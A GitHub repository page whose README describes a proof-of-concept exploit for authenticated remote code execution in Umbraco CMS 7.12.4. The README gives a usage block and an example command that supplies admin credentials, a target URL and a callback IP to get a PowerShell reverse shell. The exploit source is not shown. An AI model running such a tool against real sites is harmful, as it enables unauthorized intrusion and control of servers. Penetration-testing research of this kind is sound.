Skip to content

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

License

Notifications You must be signed in to change notification settings

Jonoans/Umbraco-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Umbraco RCE PowerShell Reverse Shell PoC

Usage

usage: exploit.py [-h] -u USER -p PASS -w URL -i IP

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       Username / Email
  -p PASS, --password PASS   Login password
  -w URL, --website-url URL  Root URL
  -i IP, --ip IP             IP address of callback listener

Examples:

python exploit.py -u admin@example.org -p password123 -w 'http://remote.website/' -i 10.10.10.1

Requirements

To install dependencies:

pip install -r requirements.txt

Reference

This is a touch-up of noraj's PoC which is based off EDB-ID-46153.
This version provides a PowerShell reverse shell upon execution.